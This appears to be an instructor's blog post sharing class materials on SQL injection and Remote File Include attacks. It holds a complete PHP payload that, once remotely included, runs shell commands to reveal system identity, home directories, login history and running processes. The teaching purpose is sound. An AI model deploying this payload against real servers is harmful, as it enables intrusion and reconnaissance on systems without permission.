Of course if you aren’t one of my students you still can read this. 🙂
In class I showed some extra slides on SQL injection. They are here http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited
Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it:
<?php $command='uname -a;id -a'; echo "Running the '$command' command:"; $output=shell_exec($command); echo "<pre>$output</pre>"; echo "<hr size=3>"; $command='ls -lABF /home/'; echo "Running the '$command' command:"; $output=shell_exec($command); echo "<pre>$output</pre>"; echo "<hr size=3>"; $command='last -10'; echo "Running the '$command' command:"; $output=shell_exec($command); echo "<pre>$output</pre>"; echo "<hr size=3>"; $command='ps -aux'; echo "Running the '$command' command:"; $output=shell_exec($command); echo "<pre>$output</pre>"; ?>
There were also some YouTube videos I referred to in class:
- https://www.youtube.com/watch?v=NN75im_us4k
- https://www.youtube.com/watch?v=OUuX8_eDvic
- https://www.youtube.com/watch?v=rHTjwPI3lVQ
Enjoy!